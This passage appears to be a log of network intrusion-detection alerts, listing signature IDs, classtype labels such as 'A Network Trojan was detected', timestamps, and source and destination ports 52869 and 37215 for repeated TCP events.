                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:36.374095
                      SID:2027339
                      Source Port:47062
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:05.678943
                      SID:2027339
                      Source Port:59672
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.993408
                      SID:2025132
                      Source Port:37872
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:00.540716
                      SID:2025132
                      Source Port:48374
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:18.694960
                      SID:2025132
                      Source Port:44710
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:37.487251
                      SID:2027339
                      Source Port:37940
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.545166
                      SID:2027339
                      Source Port:56776
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.587244
                      SID:2027339
                      Source Port:50686
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.575243
                      SID:2027339
                      Source Port:55562
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.120599
                      SID:2829579
                      Source Port:53616
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.795527
                      SID:2829579
                      Source Port:60894
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:46.740972
                      SID:2027339
                      Source Port:60774
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.392409
                      SID:2831300
                      Source Port:59254
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:01.176373
                      SID:2027339
                      Source Port:54530
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.441643
                      SID:2027339
                      Source Port:44938
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.777436
                      SID:2835222
                      Source Port:46486
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.993065
                      SID:2027339
                      Source Port:55808
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.346541
                      SID:2027339
                      Source Port:45586
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.957923
                      SID:2835222
                      Source Port:56602
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.993689
                      SID:2027339
                      Source Port:33462
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.553140
                      SID:2025132
                      Source Port:51890
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:58.383835
                      SID:2831300
                      Source Port:59804
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:14.487901
                      SID:2027339
                      Source Port:58160
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:27.237128
                      SID:2025132
                      Source Port:56086
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:00.099234
                      SID:2831300
                      Source Port:37176
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:33.830272
                      SID:2829579
                      Source Port:40008
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.267339
                      SID:2025132
                      Source Port:34032
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:58.253105
                      SID:2027339
                      Source Port:37830
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:05.200381
                      SID:2025132
                      Source Port:56994
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:18.458631
                      SID:2025132
                      Source Port:33788
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:44.341577
                      SID:2027339
                      Source Port:32880
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:32.735165
                      SID:2831300
                      Source Port:55364
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:12.531607
                      SID:2025132
                      Source Port:60610
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:07:06.909872
                      SID:2027339
                      Source Port:51224
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.524280
                      SID:2831300
                      Source Port:38978
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:48.066624
                      SID:2027339
                      Source Port:44746
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.154497
                      SID:2025132
                      Source Port:50594
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:51.240850
                      SID:2025132
                      Source Port:56874
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:37.440253
                      SID:2027339
                      Source Port:57336
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.125189
                      SID:2025132
                      Source Port:57154
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:01.290865
                      SID:2831300
                      Source Port:35294
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:47.365340
                      SID:2025132
                      Source Port:55388
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:58.240695
                      SID:2831300
                      Source Port:35092
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:40.333807
                      SID:2027339
                      Source Port:57106
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:11.296188
                      SID:2025132
                      Source Port:33442
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:52.628611
                      SID:2027339
                      Source Port:43220
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:24.516178
                      SID:2027339
                      Source Port:34140
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.807816
                      SID:2025132
                      Source Port:49050
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:33.055161
                      SID:2027339
                      Source Port:58310
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:39.662031
                      SID:2027339
                      Source Port:52444
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:23.347168
                      SID:2025132
                      Source Port:35948
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:37.450149
                      SID:2831300
                      Source Port:45980
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:57.024016
                      SID:2027339
                      Source Port:34610
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.357082
                      SID:2829579
                      Source Port:52464
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.439166
                      SID:2835222
                      Source Port:40508
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.593241
                      SID:2027339
                      Source Port:59872
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.898156
                      SID:2027339
                      Source Port:46166
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.777005
                      SID:2835222
                      Source Port:35866
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.695131
                      SID:2831300
                      Source Port:50944
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:47.739427
                      SID:2027339
                      Source Port:53466
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.111519
                      SID:2831300
                      Source Port:54508
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:58.356121
                      SID:2831300
                      Source Port:37484
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:59.171818
                      SID:2025132
                      Source Port:42718
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:52.633204
                      SID:2027339
                      Source Port:50604
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.934535
                      SID:2025132
                      Source Port:55924
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:05.488342
                      SID:2027339
                      Source Port:36534
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.143736
                      SID:2831300
                      Source Port:33942
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:55.858612
                      SID:2829579
                      Source Port:57376
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:23.359635
                      SID:2027339
                      Source Port:50976
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.569152
                      SID:2025132
                      Source Port:52150
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:33.859779
                      SID:2829579
                      Source Port:43878
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.221844
                      SID:2829579
                      Source Port:58780
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.414465
                      SID:2829579
                      Source Port:58394
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.325898
                      SID:2835222
                      Source Port:59354
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:28.197579
                      SID:2025132
                      Source Port:45738
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:07:19.727778
                      SID:2027339
                      Source Port:53522
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:11.138961
                      SID:2027339
                      Source Port:43560
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.369944
                      SID:2027339
                      Source Port:50328
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:14.422743
                      SID:2027339
                      Source Port:36270
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.493434
                      SID:2027339
                      Source Port:49570
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:33.055161
                      SID:2027339
                      Source Port:41560
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:10.357307
                      SID:2027339
                      Source Port:40712
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.971073
                      SID:2025132
                      Source Port:46902
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:47.333295
                      SID:2027339
                      Source Port:32952
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.139140
                      SID:2831300
                      Source Port:36552
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:04.058070
                      SID:2829579
                      Source Port:53860
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.450049
                      SID:2027339
                      Source Port:58316
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.754007
                      SID:2829579
                      Source Port:59086
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.134392
                      SID:2831300
                      Source Port:49670
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:39.384181
                      SID:2027339
                      Source Port:33654
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.962602
                      SID:2025132
                      Source Port:60298
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:50.554912
                      SID:2829579
                      Source Port:49054
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.444049
                      SID:2027339
                      Source Port:47050
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.944157
                      SID:2829579
                      Source Port:60332
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.235094
                      SID:2025132
                      Source Port:34254
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:03.387430
                      SID:2835222
                      Source Port:56504
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:11.978005
                      SID:2025132
                      Source Port:56764
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:08.337396
                      SID:2027339
                      Source Port:46198
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.953643
                      SID:2829579
                      Source Port:41826
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:12.549242
                      SID:2027339
                      Source Port:51304
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.985482
                      SID:2027339
                      Source Port:51964
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.910306
                      SID:2025132
                      Source Port:58482
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:48.211869
                      SID:2027339
                      Source Port:53970
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.203133
                      SID:2027339
                      Source Port:46238
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:09.741345
                      SID:2025132
                      Source Port:39236
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:37.560327
                      SID:2831300
                      Source Port:40116
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:56.124566
                      SID:2829579
                      Source Port:58894
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.104584
                      SID:2027339
                      Source Port:51900
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.963469
                      SID:2027339
                      Source Port:40158
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.328888
                      SID:2835222
                      Source Port:58208
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.342361
                      SID:2835222
                      Source Port:48014
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.117397
                      SID:2025132
                      Source Port:41670
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:48.090130
                      SID:2025132
                      Source Port:37662
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:50.600216
                      SID:2835222
                      Source Port:47282
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:46.881517
                      SID:2025132
                      Source Port:50890
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:01.433779
                      SID:2027339
                      Source Port:60010
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.447452
                      SID:2027339
                      Source Port:39054
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.657262
                      SID:2835222
                      Source Port:38548
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.413672
                      SID:2831300
                      Source Port:50150
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:57.939156
                      SID:2025132
                      Source Port:55262
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:36.472084
                      SID:2027339
                      Source Port:42090
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:29.100644
                      SID:2027339
                      Source Port:48250
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:38.250934
                      SID:2027339
                      Source Port:40094
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.429308
                      SID:2831300
                      Source Port:36998
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:18.420370
                      SID:2025132
                      Source Port:45966
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:59.473173
                      SID:2831300
                      Source Port:59588
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:34.622534
                      SID:2829579
                      Source Port:34194
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.323663
                      SID:2829579
                      Source Port:48544
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.139794
                      SID:2027339
                      Source Port:41628
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.409134
                      SID:2835222
                      Source Port:59824
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:34.258673
                      SID:2027339
                      Source Port:52018
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.166047
                      SID:2025132
                      Source Port:36218
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:56.159948
                      SID:2829579
                      Source Port:55306
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:16.287042
                      SID:2831300
                      Source Port:49740
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:47.018380
                      SID:2829579
                      Source Port:59538
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:55.889998
                      SID:2829579
                      Source Port:52786
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.918953
                      SID:2025132
                      Source Port:49368
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:38.204956
                      SID:2025132
                      Source Port:45704
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:38.461325
                      SID:2025132
                      Source Port:41248
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:01.105390
                      SID:2025132
                      Source Port:58606
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.797833
                      SID:2027339
                      Source Port:60272
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.497165
                      SID:2831300
                      Source Port:49936
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:13.708217
                      SID:2025132
                      Source Port:40064
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:08.328921
                      SID:2027339
                      Source Port:57256
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:23.161234
                      SID:2025132
                      Source Port:56972
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:39.120890
                      SID:2027339
                      Source Port:58876
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.841499
                      SID:2829579
                      Source Port:60538
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:16.628763
                      SID:2027339
                      Source Port:55030
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.422868
                      SID:2027339
                      Source Port:47588
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.325933
                      SID:2831300
                      Source Port:58002
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:35.579965
                      SID:2027339
                      Source Port:37300
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.456840
                      SID:2027339
                      Source Port:41782
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.262014
                      SID:2027339
                      Source Port:45254
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.445659
                      SID:2027339
                      Source Port:37392
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:27.335940
                      SID:2027339
                      Source Port:35854
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.269493
                      SID:2835222
                      Source Port:37096
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.544022
                      SID:2025132
                      Source Port:46646
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:48.762153
                      SID:2835222
                      Source Port:45988
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:11.472742
                      SID:2027339
                      Source Port:35226
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:21.926399
                      SID:2027339
                      Source Port:55850
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:05.768387
                      SID:2831300
                      Source Port:34388
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:38.582155
                      SID:2025132
                      Source Port:60314
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:03.111365
                      SID:2025132
                      Source Port:40128
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:52.682403
                      SID:2831300
                      Source Port:46686
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:31.663530
                      SID:2831300
                      Source Port:60448
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:34.348451
                      SID:2831300
                      Source Port:60410
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:29.180793
                      SID:2027339
                      Source Port:46750
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:14.645434
                      SID:2025132
                      Source Port:43054
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:26.155233
                      SID:2027339
                      Source Port:33854
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.009321
                      SID:2027339
                      Source Port:34518
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:10.473848
                      SID:2027339
                      Source Port:46622
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.213635
                      SID:2027339
                      Source Port:44354
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.180728
                      SID:2025132
                      Source Port:52806
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:46.788416
                      SID:2025132
                      Source Port:36962
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:40.377377
                      SID:2831300
                      Source Port:41718
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:19.865859
                      SID:2027339
                      Source Port:49366
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.716020
                      SID:2027339
                      Source Port:40184
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:55.877930
                      SID:2829579
                      Source Port:46224
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.134564
                      SID:2829579
                      Source Port:56138
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:06.231390
                      SID:2027339
                      Source Port:33526
                      Destination Port:52869
                      Protocol:TCP
